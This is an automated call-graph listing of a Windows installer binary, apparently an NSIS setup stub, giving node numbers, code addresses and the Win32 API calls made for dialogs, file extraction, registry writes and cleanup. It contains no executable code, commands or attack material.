BeginPaint GetClientRect 3627->3628 3629 40100c DefWindowProcA 3627->3629 3631 4010f3 3628->3631 3632 401179 3629->3632 3633 401073 CreateBrushIndirect FillRect DeleteObject 3631->3633 3634 4010fc 3631->3634 3633->3631 3635 401102 CreateFontIndirectA 3634->3635 3636 401167 EndPaint 3634->3636 3635->3636 3637 401112 6 API calls 3635->3637 3636->3632 3637->3636 3638 401b06 3639 401b57 3638->3639 3641 401b13 3638->3641 3642 401b80 GlobalAlloc 3639->3642 3643 401b5b 3639->3643 3640 402211 3646 405bc3 18 API calls 3640->3646 3641->3640 3649 401b2a 3641->3649 3645 405bc3 18 API calls 3642->3645 3644 401b9b 3643->3644 3659 405ba1 lstrcpynA 3643->3659 3645->3644 3648 40221e 3646->3648 3652 405462 MessageBoxIndirectA 3648->3652 3657 405ba1 lstrcpynA 3649->3657 3650 401b6d GlobalFree 3650->3644 3652->3644 3653 401b39 3658 405ba1 lstrcpynA 3653->3658 3655 401b48 3660 405ba1 lstrcpynA 3655->3660 3657->3653 3658->3655 3659->3650 3660->3644 3661 402188 3662 402a0c 18 API calls 3661->3662 3663 40218e 3662->3663 3664 402a0c 18 API calls 3663->3664 3665 402197 3664->3665 3666 402a0c 18 API calls 3665->3666 3667 4021a0 3666->3667 3668 405e9c 2 API calls 3667->3668 3669 4021a9 3668->3669 3670 4021ba lstrlenA lstrlenA 3669->3670 3674 4021ad 3669->3674 3671 404e8d 25 API calls 3670->3671 3673 4021f6 SHFileOperationA 3671->3673 3672 404e8d 25 API calls 3675 4021b5 3672->3675 3673->3674 3673->3675 3674->3672 3674->3675 2898 401389 2900 401390 2898->2900 2899 4013fe 2900->2899 2901 4013cb MulDiv SendMessageA 2900->2901 2901->2900 3676 40220a 3677 402211 3676->3677 3680 402224 3676->3680 3678 405bc3 18 API calls 3677->3678 3679 40221e 3678->3679 3681 405462 MessageBoxIndirectA 3679->3681 3681->3680 3682 40398a 3683 4039a2 3682->3683 3684 403add 3682->3684 3683->3684 3685 4039ae 3683->3685 3686 403b2e 3684->3686 3687 403aee GetDlgItem GetDlgItem 3684->3687 3688 4039b9 SetWindowPos 3685->3688 3689 4039cc 3685->3689 3691 403b88 3686->3691 3699 401389 2 API calls 3686->3699 3690 403e5d 19 API calls 3687->3690 3688->3689 3693 4039d1 ShowWindow 3689->3693 3694 4039e9 3689->3694 3695 403b18 SetClassLongA 3690->3695 3692 403ea9 SendMessageA 3691->3692 3741 403ad8 3691->3741 3739 403b9a 3692->3739 3693->3694 3696 4039f1 DestroyWindow 3694->3696 3697 403a0b 3694->3697 3698 40140b 2 API calls 3695->3698 3749 403de6 3696->3749 3701 403a10 SetWindowLongA 3697->3701 3702 403a21 3697->3702 3698->3686 3700 403b60 3699->3700 3700->3691 3703 403b64 SendMessageA 3700->3703 3701->3741 3706 403a2d GetDlgItem 3702->3706 3718 403a98 3702->3718 3703->3741 3704 40140b 2 API calls 3704->3739 3705 403de8 DestroyWindow EndDialog 3705->3749 3709 403a40 SendMessageA IsWindowEnabled 3706->3709 3710 403a5d 3706->3710 3707 403ec4 8 API calls 3707->3741 3708 403e17 ShowWindow 3708->3741 3709->3710 3709->3741 3712 403a6a 3710->3712 3713 403ab1 SendMessageA 3710->3713 3714 403a7d 3710->3714 3722 403a62 3710->3722 3711 405bc3 18 API calls 3711->3739 3712->3713 3712->3722 3713->3718 3716 403a85 3714->3716 3717 403a9a 3714->3717 3715 403e36 SendMessageA 3715->3718 3719 40140b 2 API calls 3716->3719 3720 40140b 2 API calls 3717->3720 3718->3707 3719->3722 3720->3722 3721 403e5d 19 API calls 3721->3739 3722->3715 3722->3718 3723 403e5d 19 API calls 3724 403c15 GetDlgItem 3723->3724 3725 403c32 ShowWindow EnableWindow 3724->3725 3726 403c2a 3724->3726 3750 403e7f EnableWindow 3725->3750 3726->3725 3728 403c5c EnableWindow 3731 403c70 3728->3731 3729 403c75 GetSystemMenu EnableMenuItem SendMessageA 3730 403ca5 SendMessageA 3729->3730 3729->3731 3730->3731 3731->3729 3751 403e92 SendMessageA 3731->3751 3752 405ba1 lstrcpynA 3731->3752 3734 403cd3 lstrlenA 3735 405bc3 18 API calls 3734->3735 3736 403ce4 SetWindowTextA 3735->3736 3737 401389 2 API calls 3736->3737 3737->3739 3738 403d28 DestroyWindow 3740 403d42 CreateDialogParamA 3738->3740 3738->3749 3739->3704 3739->3705 3739->3711 3739->3721 3739->3723 3739->3738 3739->3741 3742 403d75 3740->3742 3740->3749 3743 403e5d 19 API calls 3742->3743 3744 403d80 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3743->3744 3745 401389 2 API calls 3744->3745 3746 403dc6 3745->3746 3746->3741 3747 403dce ShowWindow 3746->3747 3748 403ea9 SendMessageA 3747->3748 3748->3749 3749->3708 3749->3741 3750->3728 3751->3731 3752->3734 3753 401c8a 3754 4029ef 18 API calls 3753->3754 3755 401c91 3754->3755 3756 4029ef 18 API calls 3755->3756 3757 401c99 GetDlgItem 3756->3757 3758 4024ce 3757->3758 3016 40310d SetErrorMode GetVersion 3017 403143 3016->3017 3018 403149 3016->3018 3019 405f2d 5 API calls 3017->3019 3020 405ec3 3 API calls 3018->3020 3019->3018 3021 40315e 3020->3021 3022 405ec3 3 API calls 3021->3022 3023 403168 3022->3023 3024 405ec3 3 API calls 3023->3024 3025 403172 3024->3025 3026 405f2d 5 API calls 3025->3026 3027 403179 3026->3027 3028 405f2d 5 API calls 3027->3028 3029 403180 #17 OleInitialize SHGetFileInfoA 3028->3029 3109 405ba1 lstrcpynA 3029->3109 3031 4031bd GetCommandLineA 3110 405ba1 lstrcpynA 3031->3110 3033 4031cf GetModuleHandleA 3034 4031e6 3033->3034 3035 4056bf CharNextA 3034->3035 3036 4031fa CharNextA 3035->3036 3044 403207 3036->3044 3037 403270 3038 403283 GetTempPathA 3037->3038 3111 4030dc 3038->3111 3040 403299 3041 4032bd DeleteFileA 3040->3041 3042 40329d GetWindowsDirectoryA lstrcatA 3040->3042 3121 402c38 GetTickCount GetModuleFileNameA 3041->3121 3045 4030dc 12 API calls 3042->3045 3043 4056bf CharNextA 3043->3044 3044->3037 3044->3043 3048 403272 3044->3048 3047 4032b9 3045->3047 3047->3041 3050 40333b ExitProcess CoUninitialize 3047->3050 3206 405ba1 lstrcpynA 3048->3206 3049 4032ce 3049->3050 3056 4056bf CharNextA 3049->3056 3088 403327 3049->3088 3052 403350 3050->3052 3053 40345f 3050->3053 3057 405462 MessageBoxIndirectA 3052->3057 3054 403502 ExitProcess 3053->3054 3058 405f2d 5 API calls 3053->3058 3061 4032e5 3056->3061 3062 40335e ExitProcess 3057->3062 3063 403472 3058->3063 3065 403302 3061->3065 3066 403366 3061->3066 3064 405f2d 5 API calls 3063->3064 3067 40347b 3064->3067 3069 405775 18 API calls 3065->3069 3209 4053e9 3066->3209 3070 405f2d 5 API calls 3067->3070 3072 40330d 3069->3072 3073 403484 3070->3073 3072->3050 3207 405ba1 lstrcpynA 3072->3207 3082 403492 GetCurrentProcess 3073->3082 3091 4034a2 3073->3091 3074 403387 lstrcatA lstrcmpiA 3074->3050 3077 4033a3 3074->3077 3075 40337c lstrcatA 3075->3074 3076 405f2d 5 API calls 3092 4034d9 3076->3092 3079 4033a8 3077->3079 3080 4033af 3077->3080 3212 40534f CreateDirectoryA 3079->3212 3217 4053cc CreateDirectoryA 3080->3217 3081 40331c 3208 405ba1 lstrcpynA 3081->3208 3082->3091 3083 4034ee ExitWindowsEx 3083->3054 3089 4034fb 3083->3089 3149 4035f4 3088->3149 3225 40140b 3089->3225 3090 4033b4 SetCurrentDirectoryA 3094 4033c3 3090->3094 3095 4033ce 3090->3095 3091->3076 3092->3083 3092->3089 3220 405ba1 lstrcpynA 3094->3220 3221 405ba1 lstrcpynA 3095->3221 3098 405bc3 18 API calls 3099 4033fe DeleteFileA 3098->3099 3100 40340b CopyFileA 3099->3100 3106 4033dc 3099->3106 3100->3106 3101 403453 3103 4058ef 40 API calls 3101->3103 3102 4058ef 40 API calls 3102->3106 3104 40345a 3103->3104 3104->3050 3105 405bc3 18 API calls 3105->3106 3106->3098 3106->3101 3106->3102 3106->3105 3108 40343f CloseHandle 3106->3108 3222 405401 CreateProcessA 3106->3222 3108->3106 3109->3031 3110->3033 3112 405e03 5 API calls 3111->3112 3113 4030e8 3112->3113 3114 4030f2 3113->3114 3115 405694 3 API calls 3113->3115 3114->3040 3116 4030fa 3115->3116 3117 4053cc 2 API calls 3116->3117 3118 403100 3117->3118 3228 4058a7 3118->3228 3232 405878 GetFileAttributesA CreateFileA 3121->3232 3123 402c78 3148 402c88 3123->3148 3233 405ba1 lstrcpynA 3123->3233 3125 402c9e 3126 4056db 2 API calls 3125->3126 3127 402ca4 3126->3127 3234 405ba1 lstrcpynA 3127->3234 3129 402caf GetFileSize 3130 402dab 3129->3130 3142 402cc6 3129->3142 3235 402bd4 3130->3235 3132 402db4 3134 402de4 GlobalAlloc 3132->3134 3132->3148 3246 4030c5 SetFilePointer 3132->3246 3133 403093 ReadFile 3133->3142 3247 4030c5 SetFilePointer 3134->3247 3136 402e17 3140 402bd4 6 API calls 3136->3140 3138 402dcd 3141 403093 ReadFile 3138->3141 3139 402dff 3143 402e71 33 API calls 3139->3143 3140->3148 3144 402dd8 3141->3144 3142->3130 3142->3133 3142->3136 3145 402bd4 6 API calls 3142->3145 3142->3148 3146 402e0b 3143->3146 3144->3134 3144->3148 3145->3142 3146->3146 3147 402e48 SetFilePointer 3146->3147 3146->3148 3147->3148 3148->3049 3150 405f2d 5 API calls 3149->3150 3151 403608 3150->3151 3152 403620 3151->3152 3153 40360e 3151->3153 3154 405a88 3 API calls 3152->3154 3261 405aff wsprintfA 3153->3261 3155 403641 3154->3155 3156 40365f lstrcatA 3155->3156 3158 405a88 3 API calls 3155->3158 3159 40361e 3156->3159 3158->3156 3252 4038bd 3159->3252 3162 405775 18 API calls 3163 403691 3162->3163 3164 40371a 3163->3164 3166 405a88 3 API calls 3163->3166 3165 405775 18 API calls 3164->3165 3167 403720 3165->3167 3169 4036bd 3166->3169 3168 403730 LoadImageA 3167->3168 3170 405bc3 18 API calls 3167->3170 3171 4037e4 3168->3171 3172 40375b RegisterClassA 3168->3172 3169->3164 3173 4036d9 lstrlenA 3169->3173 3176 4056bf CharNextA 3169->3176 3170->3168 3175 40140b 2 API calls 3171->3175 3174 403797 SystemParametersInfoA CreateWindowExA 3172->3174 3204 403337 3172->3204 3177 4036e7 lstrcmpiA 3173->3177 3178 40370d 3173->3178 3174->3171 3179 4037ea 3175->3179 3180 4036d7 3176->3180 3177->3178 3181 4036f7 GetFileAttributesA 3177->3181 3182 405694 3 API calls 3178->3182 3184 4038bd 19 API calls 3179->3184 3179->3204 3180->3173 3183 403703 3181->3183 3185 403713 3182->3185 3183->3178 3186 4056db 2 API calls 3183->3186 3187 4037fb 3184->3187 3262 405ba1 lstrcpynA 3185->3262 3186->3178 3189 403807 ShowWindow 3187->3189 3190 40388a 3187->3190 3192 405ec3 3 API calls 3189->3192 3263 404f5f OleInitialize 3190->3263 3194 40381f 3192->3194 3193 403890 3195 403894 3193->3195 3196 4038ac 3193->3196 3197 40382d GetClassInfoA 3194->3197 3199 405ec3 3 API calls 3194->3199 3203 40140b 2 API calls 3195->3203 3195->3204 3198 40140b 2 API calls 3196->3198 3200 403841 GetClassInfoA RegisterClassA 3197->3200 3201 403857 DialogBoxParamA 3197->3201 3198->3204 3199->3197 3200->3201 3202 40140b 2 API calls 3201->3202 3205 40387f 3202->3205 3203->3204 3204->3050 3205->3204 3206->3038 3207->3081 3208->3088 3210 405f2d 5 API calls 3209->3210 3211 40336b lstrcatA 3210->3211 3211->3074 3211->3075 3213 4053a0 GetLastError 3212->3213 3214 4033ad 3212->3214 3213->3214 3215 4053af SetFileSecurityA 3213->3215 3214->3090 3215->3214 3216 4053c5 GetLastError 3215->3216 3216->3214 3218 4053e0 GetLastError 3217->3218 3219 4053dc 3217->3219 3218->3219 3219->3090 3220->3095 3221->3106 3223 405430 CloseHandle 3222->3223 3224 40543c 3222->3224 3223->3224 3224->3106 3226 401389 2 API calls 3225->3226 3227 401420 3226->3227 3227->3054 3229 4058b2 GetTickCount GetTempFileNameA 3228->3229 3230 4058de 3229->3230 3231 40310b 3229->3231 3230->3229 3230->3231 3231->3040 3232->3123 3233->3125 3234->3129 3236 402bf5 3235->3236 3237 402bdd 3235->3237 3238 402c05 GetTickCount 3236->3238 3239 402bfd 3236->3239 3240 402be6 DestroyWindow 3237->3240 3241 402bed 3237->3241 3243 402c13 CreateDialogParamA ShowWindow 3238->3243 3244 402c36 3238->3244 3248 405f69 3239->3248 3240->3241 3241->3132 3243->3244 3244->3132 3246->3138 3247->3139 3249 405f86 PeekMessageA 3248->3249 3250 402c03 3249->3250 3251 405f7c DispatchMessageA 3249->3251 3250->3132 3251->3249 3253 4038d1 3252->3253 3270 405aff wsprintfA 3253->3270 3255 403942 3256 405bc3 18 API calls 3255->3256 3257 40394e SetWindowTextA 3256->3257 3258 40366f 3257->3258 3259 40396a 3257->3259 3258->3162 3259->3258 3260 405bc3 18 API calls 3259->3260 3260->3259 3261->3159 3262->3164 3271 403ea9 3263->3271 3265 403ea9 SendMessageA 3267 404fbb OleUninitialize 3265->3267 3266 404f82 3269 404fa9 3266->3269 3274 401389 3266->3274 3267->3193 3269->3265 3270->3255 3272 403ec1 3271->3272 3273 403eb2 SendMessageA 3271->3273 3272->3266 3273->3272 3276 401390 3274->3276 3275 4013fe 3275->3266 3276->3275 3277 4013cb MulDiv SendMessageA 3276->3277 3277->3276 3765 401490 3766 404e8d 25 API calls 3765->3766 3767 401497 3766->3767 3768 402611 3769 4028a1 3768->3769 3770 402618 3768->3770 3771 40261e FindClose 3770->3771 3771->3769 3772 402692 3773 402a0c 18 API calls 3772->3773 3775 4026a0 3773->3775 3774 4026b6 3777 405859 2 API calls 3774->3777 3775->3774 3776 402a0c 18 API calls 3775->3776 3776->3774 3778 4026bc 3777->3778 3798 405878 GetFileAttributesA CreateFileA 3778->3798 3780 4026c9 3781 402772 3780->3781 3782 4026d5 GlobalAlloc 3780->3782 3783 40277a DeleteFileA 3781->3783 3784 40278d 3781->3784 3785 402769 CloseHandle 3782->3785 3786 4026ee 3782->3786 3783->3784 3785->3781 3799 4030c5 SetFilePointer 3786->3799 3788 4026f4 3789 403093 ReadFile 3788->3789 3790 4026fd GlobalAlloc 3789->3790 3791 402741 WriteFile GlobalFree 3790->3791 3792 40270d 3790->3792 3794 402e71 33 API calls 3791->3794 3793 402e71 33 API calls 3792->3793 3797 40271a 3793->3797 3795 402766 3794->3795 3795->3785 3796 402738 GlobalFree 3796->3791 3797->3796 3798->3780 3799->3788 3800 402793 3801 4029ef 18 API calls 3800->3801 3802 402799 3801->3802 3803 4027d4 3802->3803 3804 4027bd 3802->3804 3810 402672 3802->3810 3805 4027ea 3803->3805 3806 4027de 3803->3806 3807 4027c2 3804->3807 3813 4027d1 3804->3813 3809 405bc3 18 API calls 3805->3809 3808 4029ef 18 API calls 3806->3808 3814 405ba1 lstrcpynA 3807->3814 3808->3813 3809->3813 3813->3810 3815 405aff wsprintfA 3813->3815 3814->3810 3815->3810 3816 401595 3817 402a0c 18 API calls 3816->3817 3818 40159c SetFileAttributesA 3817->3818 3819 4015ae 3818->3819 3820 401e95 3821 402a0c 18 API calls 3820->3821 3822 401e9c 3821->3822 3823 405e9c 2 API calls 3822->3823 3824 401ea2 3823->3824 3826 401eb4 3824->3826 3827 405aff wsprintfA 3824->3827 3827->3826 3828 401696 3829 402a0c 18 API calls 3828->3829 3830 40169c GetFullPathNameA 3829->3830 3831 4016d4 3830->3831 3832 4016b3 3830->3832 3833 4028a1 3831->3833 3834 4016e8 GetShortPathNameA 3831->3834 3832->3831 3835 405e9c 2 API calls 3832->3835 3834->3833 3836 4016c4 3835->3836 3836->3831 3838 405ba1 lstrcpynA 3836->3838 3838->3831 3839 402319 3840 40231f 3839->3840 3841 402a0c 18 API calls 3840->3841 3842 402331 3841->3842 3843 402a0c 18 API calls 3842->3843 3844 40233b RegCreateKeyExA 3843->3844 3845 4028a1 3844->3845 3846 402365 3844->3846 3847 40237d 3846->3847 3848 402a0c 18 API calls 3846->3848 3849 402389 3847->3849 3851 4029ef 18 API calls 3847->3851 3850 402376 lstrlenA 3848->3850 3852 4023a4 RegSetValueExA 3849->3852 3853 402e71 33 API calls 3849->3853 3850->3847 3851->3849 3854 4023ba RegCloseKey 3852->3854 3853->3852 3854->3845 3856 402819 3857 4029ef 18 API calls 3856->3857 3858 40281f 3857->3858 3859 402850 3858->3859 3861 40282d 3858->3861 3862 402672 3858->3862 3860 405bc3 18 API calls 3859->3860 3859->3862 3860->3862 3861->3862 3864 405aff wsprintfA 3861->3864 3864->3862 2902 40351a 2903 403532 2902->2903 2904 403524 CloseHandle 2902->2904 2909 40355f 2903->2909 2904->2903 2910 40356d 2909->2910 2911 403537 2910->2911 2912 403572 FreeLibrary GlobalFree 2910->2912 2913 4054c6 2911->2913 2912->2911 2912->2912 2951 405775 2913->2951 2916 4054e3 DeleteFileA 2946 403543 2916->2946 2917 4054fa 2918 40562f 2917->2918 2966 405ba1 lstrcpynA 2917->2966 2923 405e9c 2 API calls 2918->2923 2918->2946 2920 405524 2921 405535 2920->2921 2922 405528 lstrcatA 2920->2922 2967 4056db lstrlenA 2921->2967 2924 40553b 2922->2924 2927 405654 2923->2927 2926 405549 lstrcatA 2924->2926 2928 405554 lstrlenA FindFirstFileA 2924->2928 2926->2928 2929 405694 3 API calls 2927->2929 2927->2946 2928->2918 2932 405578 2928->2932 2931 40565e 2929->2931 2930 4056bf CharNextA 2930->2932 2933 405859 2 API calls 2931->2933 2932->2930 2938 40560e FindNextFileA 2932->2938 2944 405859 2 API calls 2932->2944 2945 4054c6 61 API calls 2932->2945 2948 404e8d 25 API calls 2932->2948 2949 404e8d 25 API calls 2932->2949 2971 405ba1 lstrcpynA 2932->2971 2972 4058ef 2932->2972 2934 405664 RemoveDirectoryA 2933->2934 2935 405686 2934->2935 2936 40566f 2934->2936 2937 404e8d 25 API calls 2935->2937 2941 404e8d 25 API calls 2936->2941 2936->2946 2937->2946 2938->2932 2940 405626 FindClose 2938->2940 2940->2918 2942 40567d 2941->2942 2943 4058ef 40 API calls 2942->2943 2943->2946 2947 4055db DeleteFileA 2944->2947 2945->2932 2947->2932 2948->2938 2949->2932 2998 405ba1 lstrcpynA 2951->2998 2953 405786 2954 405728 4 API calls 2953->2954 2955 40578c 2954->2955 2956 4054da 2955->2956 2957 405e03 5 API calls 2955->2957 2956->2916 2956->2917 2958 40579c 2957->2958 2958->2956 2964 4057af 2958->2964 2959 4057c7 lstrlenA 2960 4057d2 2959->2960 2959->2964 2961 405694 3 API calls 2960->2961 2963 4057d7 GetFileAttributesA 2961->2963 2962 405e9c 2 API calls 2962->2964 2963->2956 2964->2956 2964->2959 2964->2962 2965 4056db 2 API calls 2964->2965 2965->2959 2966->2920 2968 4056e8 2967->2968 2969 4056f9 2968->2969 2970 4056ed CharPrevA 2968->2970 2969->2924 2970->2968 2970->2969 2971->2932 2999 405f2d GetModuleHandleA 2972->2999 2975 405957 GetShortPathNameA 2976 405a4c 2975->2976 2977 40596c 2975->2977 2976->2932 2977->2976 2979 405974 wsprintfA 2977->2979 2981 405bc3 18 API calls 2979->2981 2980 40593b CloseHandle GetShortPathNameA 2980->2976 2982 40594f 2980->2982 2983 40599c 2981->2983 2982->2975 2982->2976 3006 405878 GetFileAttributesA CreateFileA 2983->3006 2985 4059a9 2985->2976 2986 4059b8 GetFileSize GlobalAlloc 2985->2986 2987 405a45 CloseHandle 2986->2987 2988 4059d6 ReadFile 2986->2988 2987->2976 2988->2987 2989 4059ea 2988->2989 2989->2987 3007 4057ed lstrlenA 2989->3007 2992 405a59 2994 4057ed 4 API calls 2992->2994 2993 4059ff 3012 405ba1 lstrcpynA 2993->3012 2996 405a0d 2994->2996 2997 405a20 SetFilePointer WriteFile GlobalFree 2996->2997 2997->2987 2998->2953 3000 405f53 GetProcAddress 2999->3000 3001 405f49 2999->3001 3003 4058fa 3000->3003 3013 405ec3 GetSystemDirectoryA 3001->3013 3003->2975 3003->2976 3005 405878 GetFileAttributesA CreateFileA 3003->3005 3004 405f4f 3004->3000 3004->3003 3005->2980 3006->2985 3008 405823 lstrlenA 3007->3008 3009 405801 lstrcmpiA 3008->3009 3011 40582d 3008->3011 3010 40581a CharNextA 3009->3010 3009->3011 3010->3008 3011->2992 3011->2993 3012->2996 3014 405ee5 wsprintfA LoadLibraryA 3013->3014 3014->3004 3865 401d1b GetDC GetDeviceCaps 3866 4029ef 18 API calls 3865->3866 3867 401d37 MulDiv 3866->3867 3868 4029ef 18 API calls 3867->3868 3869 401d4c 3868->3869 3870 405bc3 18 API calls 3869->3870 3871 401d85 CreateFontIndirectA 3870->3871 3872 4024ce 3871->3872 3873 401e1b 3874 402a0c 18 API calls 3873->3874 3875 401e21 3874->3875 3876 404e8d 25 API calls 3875->3876 3877 401e2b 3876->3877 3878 405401 2 API calls 3877->3878 3882 401e31 3878->3882 3879 401e87 CloseHandle 3881 402672 3879->3881 3880 401e50 WaitForSingleObject 3880->3882 3883 401e5e GetExitCodeProcess 3880->3883 3882->3879 3882->3880 3882->3881 3884 405f69 2 API calls 3882->3884 3885 401e70 3883->3885 3886 401e79 3883->3886 3884->3880 3888 405aff wsprintfA 3885->3888 3886->3879 3888->3886 3889 40429b 3890 4042c7 3889->3890 3891 4042d8 3889->3891 3950 405446 GetDlgItemTextA 3890->3950 3893 4042e4 GetDlgItem 3891->3893 3894 404343 3891->3894 3896 4042f8 3893->3896 3901 405bc3 18 API calls 3894->3901 3910 404427 3894->3910 3948 4045d1 3894->3948 3895 4042d2 3897 405e03 5 API calls 3895->3897 3899 40430c SetWindowTextA 3896->3899 3900 405728 4 API calls 3896->3900 3897->3891 3903 403e5d 19 API calls 3899->3903 3909 404302 3900->3909 3905 4043b7 SHBrowseForFolderA 3901->3905 3902 404457 3906 405775 18 API calls 3902->3906 3907 404328 3903->3907 3904 403ec4 8 API calls 3908 4045e5 3904->3908 3905->3910 3911 4043cf CoTaskMemFree 3905->3911 3912 40445d 3906->3912 3913 403e5d 19 API calls 3907->3913 3909->3899 3914 405694 3 API calls 3909->3914 3910->3948 3952 405446 GetDlgItemTextA 3910->3952 3915 405694 3 API calls 3911->3915 3953 405ba1 lstrcpynA 3912->3953 3916 404336 3913->3916 3914->3899 3917 4043dc 3915->3917 3951 403e92 SendMessageA 3916->3951 3920 404413 SetDlgItemTextA 3917->3920 3925 405bc3 18 API calls 3917->3925 3920->3910 3921 40433c 3923 405f2d 5 API calls 3921->3923 3922 404474 3924 405f2d 5 API calls 3922->3924 3923->3894 3931 40447b 3924->3931 3926 4043fb lstrcmpiA 3925->3926 3926->3920 3929 40440c lstrcatA 3926->3929 3927 4044b7 3954 405ba1 lstrcpynA 3927->3954 3929->3920 3930 4044be 3932 405728 4 API calls 3930->3932 3931->3927 3935 4056db 2 API calls 3931->3935 3937 40450f 3931->3937 3933 4044c4 GetDiskFreeSpaceA 3932->3933 3936 4044e8 MulDiv 3933->3936 3933->3937 3935->3931 3936->3937 3938 404580 3937->3938 3940 404717 21 API calls 3937->3940 3939 4045a3 3938->3939 3941 40140b 2 API calls 3938->3941 3955 403e7f EnableWindow 3939->3955 3942 40456d 3940->3942 3941->3939 3944 404582 SetDlgItemTextA 3942->3944 3945 404572 3942->3945 3944->3938 3947 404652 21 API calls 3945->3947 3946 4045bf 3946->3948 3956 404230 3946->3956 3947->3938 3948->3904 3950->3895 3951->3921 3952->3902 3953->3922 3954->3930 3955->3946 3957 404243 SendMessageA 3956->3957 3958 40423e 3956->3958 3957->3948 3958->3957 3959 40251c 3960 4029ef 18 API calls 3959->3960 3962 402526 3960->3962 3961 40255a ReadFile 3961->3962 3966 40259c 3961->3966 3962->3961 3963 40259e 3962->3963 3964 4025ae 3962->3964 3962->3966 3968 405aff wsprintfA 3963->3968 3964->3966 3967 4025c4 SetFilePointer 3964->3967 3967->3966 3968->3966 3969 401721 3970 402a0c 18 API calls 3969->3970 3971 401728 3970->3971 3972 4058a7 2 API calls 3971->3972 3973 40172f 3972->3973 3973->3973 3974 401922 3975 402a0c 18 API calls 3974->3975 3976 401929 lstrlenA 3975->3976 3977 4024ce 3976->3977 3978 403fa5 3979 403fbb 3978->3979 3984 4040c8 3978->3984 3982 403e5d 19 API calls 3979->3982 3980 404137 3981 40420b 3980->3981 3983 404141 GetDlgItem 3980->3983 3989 403ec4 8 API calls 3981->3989 3985 404011 3982->3985 3986 404157 3983->3986 3987 4041c9 3983->3987 3984->3980 3984->3981 3988 40410c GetDlgItem SendMessageA 3984->3988 3990 403e5d 19 API calls 3985->3990 3986->3987 3995 40417d 6 API calls 3986->3995 3987->3981 3991 4041db 3987->3991 4009 403e7f EnableWindow 3988->4009 3993 404206 3989->3993 3994 40401e CheckDlgButton 3990->3994 3996 4041e1 SendMessageA 3991->3996 3997 4041f2 3991->3997 4007 403e7f EnableWindow 3994->4007 3995->3987 3996->3997 3997->3993 4000 4041f8 SendMessageA 3997->4000 3998 404132 4001 404230 SendMessageA 3998->4001 4000->3993 4001->3980 4002 40403c GetDlgItem 4008 403e92 SendMessageA 4002->4008 4004 404052 SendMessageA 4005 404070 GetSysColor 4004->4005 4006 404079 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4004->4006 4005->4006 4006->3993 4007->4002 4008->4004 4009->3998 4010 401ca5 4011 4029ef 18 API calls 4010->4011 4012 401cb5 SetWindowLongA 4011->4012 4013 4028a1 4012->4013 4014 401a26 4015 4029ef 18 API calls 4014->4015 4016 401a2c 4015->4016 4017 4029ef 18 API calls 4016->4017 4018 4019d6 4017->4018 4019 40262b 4020 402646 4019->4020 4021 40262e 4019->4021 4022 4027cc 4020->4022 4025 405ba1 lstrcpynA 4020->4025 4023 40263b FindNextFileA 4021->4023 4023->4020 4025->4022 4026 401bad 4027 4029ef 18 API calls 4026->4027 4028 401bb4 4027->4028 4029 4029ef 18 API calls 4028->4029 4030 401bbe 4029->4030 4031 402a0c 18 API calls 4030->4031 4035 401bce 4030->4035 4031->4035 4032 402a0c 18 API calls 4036 401bde 4032->4036 4033 401be9 4037 4029ef 18 API calls 4033->4037 4034 401c2d 4038 402a0c 18 API calls 4034->4038 4035->4032 4035->4036 4036->4033 4036->4034 4039 401bee 4037->4039 4040 401c32 4038->4040 4041 4029ef 18 API calls 4039->4041 4042 402a0c 18 API calls 4040->4042 4044 401bf7 4041->4044 4043 401c3b FindWindowExA 4042->4043 4047 401c59 4043->4047 4045 401c1d SendMessageA 4044->4045 4046 401bff SendMessageTimeoutA 4044->4046 4045->4047 4046->4047 4048 4024b2 4049 402a0c 18 API calls 4048->4049 4050 4024b9 4049->4050 4053 405878 GetFileAttributesA CreateFileA 4050->4053 4052 4024c5 4053->4052 4054 4035b2 4055 4035bd 4054->4055 4056 4035c1 4055->4056 4057 4035c4 GlobalAlloc 4055->4057 4057->4056 2794 4015b3 2795 402a0c 18 API calls 2794->2795 2796 4015ba 2795->2796 2812 405728 CharNextA CharNextA 2796->2812 2798 40160a 2800 40162d 2798->2800 2801 40160f 2798->2801 2799 4056bf CharNextA 2803 4015d0 CreateDirectoryA 2799->2803 2805 401423 25 API calls 2800->2805 2802 401423 25 API calls 2801->2802 2804 401616 2802->2804 2806 4015e5 GetLastError 2803->2806 2809 4015c2 2803->2809 2818 405ba1 lstrcpynA 2804->2818 2811 40217f 2805->2811 2808 4015f2 GetFileAttributesA 2806->2808 2806->2809 2808->2809 2809->2798 2809->2799 2810 401621 SetCurrentDirectoryA 2810->2811 2813 405742 2812->2813 2817 40574e 2812->2817 2815 405749 CharNextA 2813->2815 2813->2817 2814 40576b 2814->2809 2815->2814 2816 4056bf CharNextA 2816->2817 2817->2814 2817->2816 2818->2810 2819 401734 2820 402a0c 18 API calls 2819->2820 2821 40173b 2820->2821 2822 401761 2821->2822 2823 401759 2821->2823 2881 405ba1 lstrcpynA 2822->2881 2880 405ba1 lstrcpynA 2823->2880 2826 40175f 2829 405e03 5 API calls 2826->2829 2827 40176c 2882 405694 lstrlenA CharPrevA 2827->2882 2833 40177e 2829->2833 2831 401789 2831->2833 2836 401795 CompareFileTime 2831->2836 2885 405e9c FindFirstFileA 2831->2885 2888 405859 GetFileAttributesA 2831->2888 2833->2831 2837 401859 2833->2837 2839 405ba1 lstrcpynA 2833->2839 2845 405bc3 18 API calls 2833->2845 2857 401830 2833->2857 2858 405878 GetFileAttributesA CreateFileA 2833->2858 2891 405462 2833->2891 2836->2831 2838 404e8d 25 API calls 2837->2838 2840 401863 2838->2840 2839->2833 2859 402e71 2840->2859 2841 404e8d 25 API calls 2847 401845 2841->2847 2844 40188a SetFileTime 2846 40189c CloseHandle 2844->2846 2845->2833 2846->2847 2848 4018ad 2846->2848 2849 4018b2 2848->2849 2850 4018c5 2848->2850 2851 405bc3 18 API calls 2849->2851 2852 405bc3 18 API calls 2850->2852 2855 4018ba lstrcatA 2851->2855 2853 4018cd 2852->2853 2856 405462 MessageBoxIndirectA 2853->2856 2855->2853 2856->2847 2857->2841 2857->2847 2858->2833 2860 402e87 2859->2860 2861 402eb5 2860->2861 2897 4030c5 SetFilePointer 2860->2897 2895 403093 ReadFile 2861->2895 2865 402ed2 GetTickCount 2867 401876 2865->2867 2876 402f21 2865->2876 2866 403027 2868 40302b 2866->2868 2869 403043 2866->2869 2867->2844 2867->2846 2871 403093 ReadFile 2868->2871 2869->2867 2872 403093 ReadFile 2869->2872 2873 40305e WriteFile 2869->2873 2870 403093 ReadFile 2870->2876 2871->2867 2872->2869 2873->2867 2874 403073 2873->2874 